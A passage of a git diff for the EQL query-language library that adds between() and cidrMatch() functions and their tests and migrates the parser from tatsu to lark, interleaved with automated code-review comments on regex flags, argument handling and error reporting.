@@ -1096,39 +1161,143 @@ network where mysterious_field arraySearch(sub1.c, nested, nested.x.y == mysterious_field.outer_cross_match)) ''' -[queries.q164] +[[queries]] expected_event_ids = [] description = "test 'safe()' wrapper for exception handling" query = ''' network where safe(divide(process_name, process_name)) ''' -[queries.q165] +[[queries]] query = ''' file where serial_event_id == 82 and (true == (process_name in ('svchost.EXE', 'bad.exe', 'bad2.exe'))) ''' expected_event_ids = [82] description = "nested set comparisons" -[queries.q166] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayCount(bytes_written_string_list, s, s == '*-us') == 1 ''' -[queries.q167] +[[queries]] expected_event_ids = [57] query = ''' registry where arrayCount(bytes_written_string_list, s, s == '*en*') == 2 ''' -[queries.q168] +[[queries]] expected_event_ids = [57] query = ''' -registry where arrayContains(bytes_written_string_list, "ross", "en-US") +registry where arrayContains(bytes_written_string_list, "missing", "en-US") +''' + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id - 1 == 81" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id + 1 == 83" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id * 2 == 164" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id / 2 == 41" + +[[queries]] +expected_event_ids = [82] +query = "file where serial_event_id % 40 == 2" + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "s", "e") == "yst" +''' + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "s", "e", false) == "yst" +''' + +[[queries]] +expected_event_ids = [] +query = ''' +process where between(process_name, "s", "e", false, true) == "yst" +''' + +[[queries]] +expected_event_ids = [1, 2, 42] +query = ''' +process where between(process_name, "s", "e", false, true) == "t" 
+''' + +[[queries]] +expected_event_ids = [1, 2] +query = ''' +process where between(process_name, "S", "e", false, true) == "yst" +''' + +[[queries]] +expected_event_ids = [1] +query = ''' +process where between(process_name, "s", "e", true) == "ystem Idle Proc" +''' + +[[queries]] +expected_event_ids = [95] +query = ''' +file where between(file_path, "dev", ".json", false) == "\\testlogs\\something" +''' + +[[queries]] +expected_event_ids = [95] +query = ''' +file where between(file_path, "dev", ".json", true) == "\\testlogs\\something" +''' + +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "10.6.48.157/8") +''' + +[[queries]] +expected_event_ids = [] +query = ''' +network where cidrMatch(source_address, "192.168.0.0/16") +''' + +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "192.168.0.0/16", "10.6.48.157/8") + +''' +[[queries]] +expected_event_ids = [75304, 75305] +query = ''' +network where cidrMatch(source_address, "0.0.0.0/0") +''' + +[[queries]] +expected_event_ids = [7, 14, 22, 29, 44] +query = ''' +process where length(between(process_name, 'g', 'e')) > 0 +''' + +[[queries]] +expected_event_ids = [] +query = ''' +process where length(between(process_name, 'g', 'z')) > 0 ''' -[queries.q169] +[[queries]] expected_event_ids = [11, 50] description = "test window pipe" query = ''' @@ -1139,7 +1308,7 @@ unique_count parent_process_name | filter count == 5 ''' -[queries.q170] +[[queries]] expected_event_ids = [55] description = "test window pipe with descendant" query = ''' diff --git a/eql/functions.py b/eql/functions.py index 6083fc9..2112731 100644 --- a/eql/functions.py +++ b/eql/functions.py @@ -1,5 +1,7 @@ """EQL functions.""" import re +import socket +import struct from .signatures import SignatureMixin from .errors import EqlError 
@@ -10,6 +12,8 @@ _registry = {} +REGEX_FLAGS = re.IGNORECASE | re.UNICODE | re.DOTALL +MAX_IP = 0xffffffff def register(func): @@ -37,6 +41,15 @@ def get_callback(cls, *arguments): """Get a callback function for the AST.""" return cls.run + @classmethod + def optimize(cls, arguments): + """Optimize each function independently.""" + return FunctionCall(cls.name, arguments) + + @classmethod + def alternate_render(cls, arguments, precedence=None, **kwargs): + """Return an alternate rendering for a function.""" + @classmethod def run(cls, *arguments): """Reference implementation of the function.""" @@ -64,6 +77,14 @@ class MathFunctionSignature(FunctionSignature): argument_types = [NUMBER, NUMBER] return_value = NUMBER + operator = None + + @classmethod + def optimize(cls, arguments): + """Convert to a MathOperation.""" + if cls.operator: + return MathOperation(arguments[0], cls.operator, arguments[1]) + return FunctionCall(cls.name, arguments) @register 
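Review bot: `REGEX_FLAGS` changes matching semantics at the call sites it replaces in later hunks (`@@ -243,7 +481,7 @@` in this file and `@@ -421,16 +659,27 @@`): the `run()` paths previously passed `re.MULTILINE`, which is now dropped, while the compiled `get_callback` paths previously had no `re.DOTALL` and now gain it. The patterns are supplied by the query author, so a `$` in a `match(?'...')` pattern stops matching at embedded line breaks, and `.` in wildcard-derived patterns now crosses them. If that unification is intended, record it on the constant, e.g. `# shared by match()/wildcard(): DOTALL so '.' spans newlines; MULTILINE deliberately omitted so '^'/'$' anchor the whole value`; otherwise add `re.MULTILINE` back.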
@@ -120,6 +141,223 @@ class ArraySearch(DynamicFunctionSignature):
 return_value = BOOLEAN
+@register
+class Between(FunctionSignature):
+ """Return a substring that's between two other substrings."""
+
+ name = "between"
+ argument_types = [STRING, STRING, STRING, literal(BOOLEAN), literal(BOOLEAN)]
+ minimum_args = 3
+ return_value = STRING
+
+ @classmethod
+ def run(cls, source_string, first, second, greedy=False, case_sensitive=False):
+ """Return the substring between two other ones."""
+ if is_string(source_string) and is_string(first) and is_string(second) and first and second:
+ match_string = source_string
+
+ if not case_sensitive:
+ match_string = match_string.lower()
+ first = first.lower()
+ second = second.lower()
+
+ before, first_match, remaining = match_string.partition(first)
+ if not first_match:
+ return ""
+
+ start_pos = len(before) + len(first_match)
+
+ if greedy:
+ between, second_match, _ = remaining.rpartition(second)
+ else:
+ between, second_match, _ = remaining.partition(second)
+
+ if not second_match:
+ return ""
+
+ end_pos = start_pos + len(between)
+ return source_string[start_pos:end_pos]
+
+
+@register
+class CidrMatch(FunctionSignature):
+ """Math an IP address against a list of IPv4 subnets in CIDR notation."""
+
+ name = "cidrMatch"
+ argument_types = [STRING, literal(STRING)]
+ additional_types = literal(STRING)
+ return_value = BOOLEAN
+
+ octet_re = r'(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])'
+ ip_re = r'\.'.join([octet_re, octet_re, octet_re, octet_re])
+ ip_compiled = re.compile(r'^{}$'.format(ip_re))
+ cidr_compiled = re.compile(r'^{}/(3[0-2]|2[0-9]|1[0-9]|[0-9])$'.format(ip_re))
+
+ # store it in native representation, then recover it in network order
+ masks = [struct.unpack(">L", struct.pack(">L", MAX_IP & ~(MAX_IP >> b)))[0] for b in range(33)]
+ mask_addresses = [socket.inet_ntoa(struct.pack(">L", m)) for m in masks]
+
+ @classmethod
+ def to_mask(cls, cidr_string):
+ """Split an IP address plus cidr block to the 
mask."""
+ ip_string, size = cidr_string.split("/")
+ size = int(size)
+ ip_bytes = socket.inet_aton(ip_string)
+ subnet_int, = struct.unpack(">L", ip_bytes)
+
+ mask = cls.masks[size]
+
+ return subnet_int & mask, mask
+
+ @classmethod
+ def make_octet_re(cls, start, end):
+ """Convert an octet-range into a regular expression."""
+ combos = []
+
+ if start == end:
+ return "{:d}".format(start)
+
+ if start == 0 and end == 255:
+ return cls.octet_re
+
+ # 0xx, 1xx, 2xx
+ for hundreds in (0, 100, 200):
+ h = int(hundreds / 100)
+ h_digit = "0?" if h == 0 else "{:d}".format(h)
+
+ # if the whole range is included, then add it
+ if start <= hundreds < hundreds + 99 <= end:
+ # allow for leading zeros
+ if h == 0:
+ combos.append("{:s}[0-9]?[0-9]".format(h_digit))
+ else:
+ combos.append("{:s}[0-9][0-9]".format(h_digit))
+ continue
+
+ # determine which of the tens ranges are entirely included
+ # so that we can do "h[a-b][0-9]"
+ hundreds_matches = []
+ full_tens = []
+
+ # now loop over h00, h10, h20
+ for tens in range(hundreds, hundreds + 100, 10):
+ t = int(tens / 10) % 10
+ t_digit = "0?" if (h == 0 and t == 0) else "{:d}".format(t)
+
+ if start <= tens < tens + 9 <= end:
+ # fully included, add to the list
+ full_tens.append(t)
+ continue
+
+ # now add the final [a-b]
+ matching_ones = [one % 10 for one in range(tens, tens + 10) if start <= one <= end]
+
+ if matching_ones:
+ ones_match = t_digit
+ if len(matching_ones) == 1:
+ ones_match += "{:d}".format(matching_ones[0])
+ else:
+ ones_match += "[{:d}-{:d}]".format(min(matching_ones), max(matching_ones))
+ hundreds_matches.append(ones_match)
+
+ if full_tens:
+ if len(full_tens) == 1:
+ tens_match = "{:d}".format(full_tens[0])
+ else:
+ tens_match = "[{:d}-{:d}]".format(min(full_tens), max(full_tens))
+
+ # allow for 001 - 009
+ if h == 0 and 0 in full_tens:
+ tens_match += "?"
+
+ tens_match += "[0-9]"
+ hundreds_matches.append(tens_match)
+
+ if len(hundreds_matches) == 1:
+ combos.append("{:s}{:s}".format(h_digit, hundreds_matches[0]))
+ elif len(hundreds_matches) > 1:
+ combos.append("{:s}({:s})".format(h_digit, "|".join(hundreds_matches)))
+
+ return "({})".format("|".join(combos))
+
+ @classmethod
+ def make_cidr_regex(cls, cidr):
+ """Convert a list of wildcards strings for matching a cidr."""
+ min_octets, max_octets = cls.to_range(cidr)
+ return r"\.".join(cls.make_octet_re(*pair) for pair in zip(min_octets, max_octets))
+
+ @classmethod
+ def to_range(cls, cidr):
+ """Get the IP range for a list of IP addresses."""
+ ip_integer, mask = cls.to_mask(cidr)
+ max_ip_integer = ip_integer | (MAX_IP ^ mask)
+
+ min_octets = struct.unpack("BBBB", struct.pack(">L", ip_integer))
+ max_octets = struct.unpack("BBBB", struct.pack(">L", max_ip_integer))
+
+ return min_octets, max_octets
+
+ @classmethod
+ def get_callback(cls, _, *cidr_matches):
+ """Get the callback function with all the masks converted."""
+ masks = [cls.to_mask(cidr.value) for cidr in cidr_matches]
+
+ def callback(source, *_):
+ if is_string(source) and cls.ip_compiled.match(source):
+ ip_integer, _ = cls.to_mask(source + "/32")
+
+ for subnet, mask in masks:
+ if ip_integer & mask == subnet:
+ return True
+
+ return False
+
+ return callback
+
+ @classmethod
+ def run(cls, ip_address, cidr_matches):
+ """Compare an IP address against a list of cidr blocks."""
+ if is_string(ip_address) and cls.ip_compiled.match(ip_address):
+ ip_integer, _ = cls.to_mask(ip_address + "/32")
+
+ for cidr in cidr_matches:
+ if is_string(cidr) and cls.cidr_compiled.match(cidr):
+ subnet, mask = cls.to_mask(cidr)
+ if ip_integer & mask == subnet:
+ return True
+
+ return False
+
+ @classmethod
+ def validate(cls, arguments, type_hints=None):
+ """Validate the calling convention and change the argument order if necessary."""
+ # used to have just two arguments and the pattern was on the left 
and expression on the right
+ error_position, _, _ = super(CidrMatch, cls).validate(arguments, type_hints)
+
+ if error_position is not None:
+ return error_position, arguments, type_hints
+
+ # create a copy of the array that we can modify
+ arguments = arguments[:]
+
+ for pos, argument in enumerate(arguments[1:], 1):
+ argument = arguments[pos] = String(argument.value.strip())
+
+ if not cls.cidr_compiled.match(argument.value):
+ return pos, arguments, type_hints
+
+ # Since it does match, we should also rewrite the string
+ ip_address, size = argument.value.split("/")
+ subnet_integer, _ = cls.to_mask(argument.value)
+ subnet_bytes = struct.pack(">L", subnet_integer)
+ subnet_base = socket.inet_ntoa(subnet_bytes)
+
+ # overwrite the original argument so it becomes the subnet
+ argument.value = "{}/{}".format(subnet_base, size)
+
+ return None, arguments, type_hints
+
+
 @register
 class Concat(FunctionSignature):
 """Concatenate multiple values as strings."""
@@ -145,7 +383,7 @@ class Divide(MathFunctionSignature):
 @classmethod
 def run(cls, x, y):
 """Divide numeric values."""
- if is_number(x) and is_number(y):
+ if is_number(x) and is_number(y) and y != 0:
 return float(x) / float(y)
@@ -220,7 +458,7 @@ def join_regex(cls, *regex):
 def get_callback(cls, source_ast, *regex_literals):
 """Get a callback function that uses the compiled regex."""
 regs = [reg.value for reg in regex_literals]
- compiled = re.compile("|".join(regs), re.IGNORECASE | re.UNICODE)
+ compiled = re.compile("|".join(regs), REGEX_FLAGS)
 def callback(source, *_):
 return is_string(source) and compiled.match(source) is not None
@@ -243,7 +481,7 @@ def run(cls, source, *matches):
 source = source.decode("utf-8", "ignore")
 if is_string(source):
- match = re.match("|".join(matches), source, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL)
+ match = re.match("|".join(matches), source, REGEX_FLAGS)
 return match is not None
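Review bot: `CidrMatch.run` declares its subnets as a single positional `cidr_matches`, while the `get_callback(cls, _, *cidr_matches)` above it and the base `run(cls, *arguments)` it overrides (the default `get_callback` returns `cls.run`) use varargs; invoked the base-class way, `run("10.1.2.3", "10.0.0.0/8")` iterates the characters of the string, none of which satisfy `cidr_compiled`, and returns False with no error. `def run(cls, ip_address, *cidr_matches):` brings the two paths into agreement. `ip_compiled` and `cidr_compiled` anchor with `^...$`, and `$` also matches before a trailing newline, so a value such as `"10.1.2.3\n"` passes `ip_compiled.match` in `callback` and is handed to `socket.inet_aton` by `to_mask`; anchoring with `\Z` (or using `fullmatch`) closes that gap. In `Between.run` the slice offsets are computed on the lowercased copy and applied to `source_string`; for the few characters whose `lower()` changes the string length the slice shifts, which deserves at least a `# NOTE: assumes lower() preserves length` comment if that edge is accepted.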
@@ -421,16 +659,27 @@ def get_callback(cls, source_ast, *wildcard_literals): """Get a callback function that uses the compiled regex.""" wc_values = [wc.value for wc in wildcard_literals] pattern = cls.to_regex(*wc_values) - compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE) + compiled = re.compile(pattern, REGEX_FLAGS) def callback(source, *_): return is_string(source) and compiled.match(source) is not None return callback + @classmethod + def alternate_render(cls, arguments, precedence=None, **kwargs): + """Allow some functions to be rendered back as shorthand.""" + if len(arguments) == 2 and isinstance(arguments[1], String): + lhs, rhs = arguments + return Comparison(lhs, Comparison.EQ, rhs).render(precedence, **kwargs) + @classmethod def run(cls, source, *wildcards): """Compare a string against a list of wildcards.""" pattern = cls.to_regex(*wildcards) - compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + compiled = re.compile(pattern, REGEX_FLAGS) return is_string(source) and compiled.match(source) is not None + + +# circular dependency +from .ast import MathOperation, FunctionCall, Comparison, String # noqa: E402 diff --git a/eql/highlighters.py b/eql/highlighters.py index ce29c41..cc7741f 100644 --- a/eql/highlighters.py +++ b/eql/highlighters.py @@ -62,7 +62,7 @@ class EqlLexer(RegexLexer): (r'\?"(\\"|[^"])*"?', token.String.Regex), (r"\?'(\\'|[^'])*'?", token.String.Regex), - (r'(==|=|!=|<|<=|>=|>)', token.Operator), + (r'(==|=|!=|<|<=|>=|>|\+|\-|\*|/|\%|:)', token.Operator), (r'[()\[\],.]', token.Punctuation), ] } diff --git a/eql/parser.py b/eql/parser.py index fc908a8..c4b059e 100644 --- a/eql/parser.py +++ b/eql/parser.py 
@@ -4,14 +4,12 @@ import datetime import re import sys -from collections import OrderedDict -import threading +from collections import OrderedDict, defaultdict +import contextlib -import tatsu -import tatsu.exceptions -import tatsu.objectmodel -import tatsu.semantics -import tatsu.walkers +from lark import Lark, Tree, Token +from lark.visitors import Interpreter +from lark.exceptions import LarkError from . import ast from . import pipes @@ -36,6 +34,7 @@ "ignore_missing_functions", "strict_field_schema", "allow_enum_fields", + "extract_query_terms", ) @@ -58,9 +57,6 @@ RESERVED = {n.render(): n for n in [ast.Boolean(True), ast.Boolean(False), ast.Null()]} -GRAMMAR = None -compiled_parser = None -compiler_lock = threading.Lock() NON_SPACE_WS = re.compile(r"[^\S ]+") 
@@ -70,28 +66,43 @@ strict_field_schema = ParserConfig(strict_fields=True, implied_booleans=False) allow_enum_fields = ParserConfig(enable_enum=True) +keywords = ("and", "by", "const", "false", "in", "join", "macro", + "not", "null", "of", "or", "sequence", "true", "until", "with", "where" + ) -local = threading.local() -try: - from ._parsergen import EQLParser # noqa: E402 - local.parser = EQLParser(parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) -except ImportError: - pass +class KvTree(Tree): + """Helper class with methods for looking up child nodes by name.""" + def get(self, name): + """Get a child by the name of the data.""" + for match in self.get_list(name): + return match -def transpose(iter): - """Transpose iterables.""" - if not iter: - return [], [] - return [list(t) for t in zip(*iter)] + def get_list(self, name): + """Get a list of all children for a name.""" + return [child for child in self.children + if isinstance(child, Token) and child.type == name or + isinstance(child, KvTree) and child.data == name] + def __contains__(self, item): + return any(isinstance(child, Token) and child.type == item or + isinstance(child, KvTree) and child.data == item for child in self.children) -class EqlWalker(tatsu.walkers.NodeWalker): - """Walker of Tatsu semantic model to convert it into a EQL AST.""" + def __getitem__(self, item): + """Helper method for getting by index.""" + return self.get(item) - def __init__(self): - """Walker for building an EQL syntax tree from a Tatsu syntax tree. + @property + def child_trees(self): + return [child for child in self.children if isinstance(child, KvTree)] + + +class LarkToEQL(Interpreter): + """Walker of Lark tree to convert it into a EQL AST.""" + + def __init__(self, text): + """Walker for building an EQL syntax tree from a Lark tree. :param bool implied_any: Allow for event queries to skip event type and WHERE, replace with 'any where ...' 
:param bool implied_base: Allow for queries to be built with only pipes. Base query becomes 'any where true' @@ -99,7 +110,8 @@ def __init__(self): :param bool pipes: Toggle support for pipes :param PreProcessor preprocessor: Use an EQL preprocessor to expand definitions and constants while parsing """ - super(EqlWalker, self).__init__() + self.text = text + self._lines = None self.implied_base = ParserConfig.read_stack("implied_base", False) self.implied_any = ParserConfig.read_stack("implied_any", False) 
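Review bot: `KvTree.get` builds the full `get_list(name)` result only to return its first element; `return next(iter(self.get_list(name)), None)`, or a loop over `self.children` with an early return, states the intent directly. `__contains__` and `child_trees` are the only members of the class without a docstring, unlike `get`, `get_list` and `__getitem__`; `"""Check whether a child token or subtree named *item* exists."""` and `"""All children that are KvTree nodes (tokens excluded)."""` would match the siblings. The `and`/`or` chains in `get_list` and `__contains__` rely on operator precedence; parenthesizing each `isinstance(...) and ...` term makes the grouping explicit to the reader.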
@@ -132,54 +144,92 @@ def __init__(self): self._pipe_schemas = [] self._var_types = dict() self._check_functions = ParserConfig.read_stack("check_functions", True) + self._stacks = defaultdict(list) + + @property + def lines(self): + """Lazily split lines in the original text.""" + if self._lines is None: + self._lines = [t.rstrip("\r\n") for t in self.text.splitlines(True)] + + return self._lines + + @staticmethod + def unzip_hints(rv): + """Separate a list of (node, hints) into separate arrays.""" + rv = list(rv) + + if not rv: + return [], [] + + nodes, hints = zip(*rv) + return list(nodes), list(hints) + + @contextlib.contextmanager + def scoped(self, **kv): + """Set scoped values.""" + for k, v in kv.items(): + self._stacks[k].append(v) + try: + yield + finally: + for k in kv: + self._stacks[k].pop() + + def scope(self, name, default=None): + """Read something from the scope.""" + stack = self._stacks[name] + if len(stack) == 0: + return default + return stack[-1] @property def multiple_events(self): """Check if multiple events can be queried.""" return len(self._pipe_schemas) > 1 - @property - def event_type(self): - """Get the active event type.""" - if not self._event_types: - return EVENT_TYPE_ANY - return self._event_types[-1] - - @staticmethod - def _error(node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + def _error(self, node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + # type: (KvTree, str) -> Exception """Generate.""" - params = dict(node.ast) + params = {} + for child in node.children: + if isinstance(child, Token): + params[child.type] = child.value + elif isinstance(child, KvTree): + # TODO: Recover the original string slice + params[child.data] = child + for k, value in params.items(): if isinstance(value, list): params[k] = ', '.join([v.render() if isinstance(v, ast.EqlNode) else to_unicode(v) for v in value]) + params.update(kwargs) message = message.format(**params) - line_number = 
node.parseinfo.line + line_number = node.line - 1 if not end else node.end_line - 1 + column = node.column - 1 if not end else node.end_column - 1 # get more lines for more informative error messages. three before + two after - before = node.parseinfo.buffer.get_lines(0, line_number)[-3:] - after = node.parseinfo.buffer.get_lines(line_number+1)[:2] + before = self.lines[:line_number + 1][-3:] + after = self.lines[line_number + 1:][:3] - source = '\n'.join(b.rstrip('\r\n') for b in before) - trailer = '\n'.join(a.rstrip('\r\n') for a in after) + source = '\n'.join(b for b in before) + trailer = '\n'.join(a for a in after) # lines = node.parseinfo.text_lines() # source = '\n'.join(l.rstrip() for l in lines) - col = node.line_info.col # Determine if the error message can easily look like this # ^^^^ - if width is None and not end: - if not NON_SPACE_WS.search(node.text): - width = len(node.text) + if width is None and not end and node.line == node.end_line: + if not NON_SPACE_WS.search(self.lines[line_number][column:node.end_column]): + width = node.end_column - node.column if width is None: width = 1 - return cls(message, line_number, col, source, width=width, trailer=trailer) + return cls(message, line_number, column, source, width=width, trailer=trailer) - @classmethod - def _type_error(cls, node, message, expected_type, actual_type=None, **kwargs): + def _type_error(self, node, message, expected_type, actual_type=None, **kwargs): """Return an exception for type mismatches.""" kwargs.setdefault('cls', EqlTypeMismatchError) expected_spec = types.get_specifier(expected_type) @@ -204,7 +254,7 @@ def get_friendly_name(t, show_spec=False): if len(union_type) != 1: type_strings.append("array") else: - type_strings.append("array[{}]".format(get_friendly_name(union_type, show_spec=False))) + type_strings.append("array[{}]".format(get_friendly_name(union_type[0], show_spec=False))) elif len(t) == 1 or union_type != "null": type_strings.append(to_unicode(union_type)) 
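Review bot: The comment in `_error` still says `three before + two after`, but the new code takes `self.lines[line_number + 1:][:3]`, so either the comment or the slice is wrong (the replaced line used `[:2]`). `source = '\n'.join(b for b in before)` and the `trailer` line wrap a list in a no-op generator; `'\n'.join(before)` and `'\n'.join(after)` are equivalent now that `lines` already strips the line endings. In the `params` loop a second child with the same `Token.type` or `KvTree.data` silently overwrites the first, which matters for messages formatted with `{...}` placeholders; a hedged comment such as `# NOTE: later children with the same name win — confirm no message relies on the first` would make that visible.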
@@ -218,7 +268,7 @@ def get_friendly_name(t, show_spec=False): expected_type = get_friendly_name(expected_type, show_spec=not spec_match) actual_type = get_friendly_name(actual_type, show_spec=not spec_match) - return cls._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) + return self._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) def _walk_default(self, node, *args, **kwargs): """Callback function to walk the AST.""" 
@@ -228,39 +278,35 @@ def _walk_default(self, node, *args, **kwargs): return tuple(self.walk(n, *args, **kwargs) for n in node) return node - def walk(self, node, *args, **kwargs): - """Optimize the AST while walking it.""" - event_type = kwargs.pop("event_type", None) - split = kwargs.pop("split", False) + def visit_children(self, tree): + """Wrap visit_children to be more flexible.""" + if tree is None: + return None + + return Interpreter.visit_children(self, tree) - if event_type is not None: - self._event_types.append(event_type) + def visit(self, tree): + """Optimize a return value.""" + if tree is None: + return None - output = super(EqlWalker, self).walk(node, *args, **kwargs) + if isinstance(tree, list): + return [self.visit(t) for t in tree] - if event_type is not None: - self._event_types.pop() + rv = Interpreter.visit(self, tree) - if isinstance(output, tuple) and isinstance(output[0], ast.EqlNode) and isinstance(output[1], tuple): - output_node, output_hint = output + if isinstance(rv, tuple) and rv and isinstance(rv[0], ast.EqlNode): + output_node, output_hint = rv output_node = output_node.optimize() # If it was optimized to a literal, the type may be constrained if isinstance(output_node, ast.Literal): output_hint = types.get_specifier(output_hint), types.get_type(output_node.type_hint) - output = output_node, output_hint - elif isinstance(output, ast.EqlNode): - return output.optimize() - - if split: - if isinstance(output, list): - return [list(o) for o in transpose(output)] - return zip(*output) + return output_node, output_hint + return rv - return output - - def validate_signature(self, node, signature, arguments, hints): + def validate_signature(self, node, signature, argument_nodes, arguments, hints): """Validate a signature against input arguments and type hints.""" error_node = node node_type = 'pipe' if issubclass(signature, ast.PipeCommand) else 'function' 
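Review bot: The new guard in `visit`, `isinstance(rv, tuple) and rv and isinstance(rv[0], ast.EqlNode)`, unpacks `output_node, output_hint = rv` without checking the tuple length, whereas the removed code also required `isinstance(output[1], tuple)`; any callback that returns a longer or shorter tuple whose first element is a node now fails with a ValueError inside the visitor rather than in the callback. Tightening it to `if isinstance(rv, tuple) and len(rv) == 2 and isinstance(rv[0], ast.EqlNode):` keeps the old contract. `validate_signature` begins at the end of this hunk and continues outside it.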
@@ -278,10 +324,9 @@ def validate_signature(self, node, signature, arguments, hints): max_args = len(signature.argument_types) # Try to line up the error message with the argument that went wrong - # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo if min_args is not None and len(arguments) < min_args: - message = "Expected at least {} argument{} to pipe {}".format( - min_args, 's' if min_args != 1 else '', node.name) + message = "Expected at least {} argument{} to {} {}".format( + min_args, 's' if min_args != 1 else '', node_type, self.visit(node["name"])) raise self._error(error_node, message, end=len(arguments) != 0) elif max_args is not None and max_args < len(arguments): @@ -292,12 +337,12 @@ def validate_signature(self, node, signature, arguments, hints): else: argument_desc = 'up to {} arguments'.format(max_args) message = "Expected {} to {} {}".format(argument_desc, node_type, name) - error_node = node.args[max_args] + error_node = argument_nodes[max_args] raise self._error(error_node, message) elif bad_index is not None: - if isinstance(node.args[bad_index], tatsu.semantics.Node): - error_node = node.args[bad_index] + if isinstance(argument_nodes[bad_index], (KvTree, Token)): + error_node = argument_nodes[bad_index] actual_type = hints[bad_index] expected_type = signature.additional_types 
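Review bot: The min-args message re-visits the name with `self.visit(node["name"])`, while the max-args message a few lines below (second hunk on this line) formats an existing `name` variable; since `name` is evidently already in scope, use it in both places so the error path cannot re-raise from `name()`'s keyword check, e.g. `min_args, 's' if min_args != 1 else '', node_type, name)`. In the `bad_index` branch, `error_node = argument_nodes[bad_index]` is accepted when the argument node is a `Token`, but `_error` iterates `node.children`, which a lark `Token` (a `str` subclass) does not have; if that is the `Token` in use here, either restrict the isinstance check to `KvTree` or give `_error` a Token-tolerant path. The enclosing `validate_signature` starts and ends outside these hunks.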
@@ -312,72 +357,30 @@ def validate_signature(self, node, signature, arguments, hints): return new_arguments, new_hints - def walk__root_expression(self, node, keep_hint=False, query_condition=False): - """Get the root expression, and rip out the type hint.""" - expr, hint = self.walk(node.expr) - if query_condition and not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): - raise self._type_error(node.expr, "Expected {expected_type} not {actual_type}", types.BOOLEAN, hint) - if keep_hint: - return expr, hint - return expr + def start(self, node): + """Entry point for the grammar.""" + return self.visit(node.children[0]) # literals - def walk__literal(self, node, **kwargs): + def literal(self, node): """Callback function to walk the AST.""" - value = self.walk(node.value) - cls = ast.Literal.find_type(value) - - if cls is ast.String: - value = to_unicode(value) + value, = self.visit_children(node) + if is_string(value): + return ast.String(value), types.literal(ast.String) + return ast.Number(value), types.literal(ast.Number.type_hint) - # If a 'raw' string is detected, then only unescape the quote character - if node.text.startswith('?'): - quote_char = node.text[-1] - value = value.replace("\\" + quote_char, quote_char) - else: - value = ast.String.unescape(value) - - return cls(value), types.literal(cls.type_hint) - - def walk__time_range(self, node): + def time_range(self, node): """Callback function to walk the AST.""" - val = self.walk(node.val) - unit = self.walk(node.unit) + val, unit = self.visit_children(node) + for name, interval in units.items(): if name.startswith(unit.rstrip('s') or 's'): return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) - raise self._error(node, "Unknown time unit") - - def walk__check_parentheses(self, node): - """Check that parentheses are matching.""" - # check for the deepest one first, so it can raise an exception - expr = self.walk(node.expr) - - if 
node.ast.get('closing', ')') is None: - raise self._error(node, "Mismatched parentheses ()") - return expr + raise self._error(node["name"], "Unknown time unit") # fields - def walk__attribute(self, node): - """Validate attributes.""" - if node.attr in RESERVED: - raise self._error(node, "Illegal use of reserved value") - return node.attr - - def walk__array_index(self, node): - """Get the index for the field in the array.""" - if node.ast.get('value', None) is not None: - return node.value - - if node.ast.get('closing', ']') is None: - raise self._error(node, "Mismatched brackets []") - - if 'missing' in node.ast: - raise self._error(node, "Required index to array.") - raise self._error(node, "Invalid index to array.") - - def _get_field_hint(self, node, field, allow_enum=False): + def _get_field_hint(self, node, field): type_hint = types.BASE_ALL allow_missing = self._schema.allow_missing @@ -400,9 +403,9 @@ def _get_field_hint(self, node, field, allow_enum=False): return field, types.dynamic(type_hint) # check if it's a variable and - elif node.base not in self._var_types: + elif field.base not in self._var_types: event_field = field - event_type = self.event_type + event_type = self.scope("event_type", default=EVENT_TYPE_ANY) type_hint = self._schema.get_event_type_hint(event_type, event_field.full_path) 
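Review bot: `time_range` now raises with `self._error(node["name"], "Unknown time unit")`, but the same method unpacks the node as `val, unit = self.visit_children(node)`; if the unit child is not a `name` subtree, `node["name"]` presumably yields None and `_error` fails on `None.children` instead of reporting the unit — a short comment naming the expected child shape (or passing `node` as the error node) would make this robust. The docstrings on `literal` and `time_range` are still the generic "Callback function to walk the AST."; something like `"""Build a String or Number literal and its type hint."""` and `"""Convert a number plus unit into an ast.TimeRange."""` would actually describe them. `_get_field_hint` drops the `allow_enum` parameter; the body continues outside the hunk, so please confirm no remaining caller passes it.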
@@ -428,55 +431,116 @@ def _get_field_hint(self, node, field, allow_enum=False): return field, types.dynamic(type_hint) - def walk__field(self, node, get_variable=False, **kwargs): - """Callback function to walk the AST.""" - if get_variable: - if node.base in RESERVED or node.sub_fields: - raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) - elif node.base in self._var_types: - raise self._error(node, "Reuse of variable {base}") + def _add_variable(self, name, type_hint=types.BASE_ALL): + self._var_types[name] = type_hint + return ast.Field(name), types.VARIABLE + + def method_chain(self, node): + """Expand a chain of methods into function calls.""" + rv = None + for prev_node, function_node in zip(node.children[:-1], node.children[1:]): + rv = self.function_call(function_node, prev_node, rv) - # This can be overridden by the parent function that is parsing it - self._var_types[node.base] = types.BASE_ALL - return ast.Field(node.base), types.VARIABLE + return rv - if node.base in RESERVED: - if len(node.sub_fields) != 0: - raise self._error(node, "Illegal use of reserved value") + def value(self, node): + """Check if a value is signed.""" + value, value_hint = self.visit(node.children[1]) + if not types.check_types(types.NUMBER, value_hint): + raise self._type_error(node, "Sign applied to non-numeric value", types.NUMBER, value_hint) - value = RESERVED[node.base] + if node.children[0] == "-": + if isinstance(value, ast.Number): + value.value = -value.value + else: + value = ast.MathOperation(ast.Number(0), "-", value) + + return value, value_hint + + def name(self, node): + """Check for illegal use of keyword.""" + text = 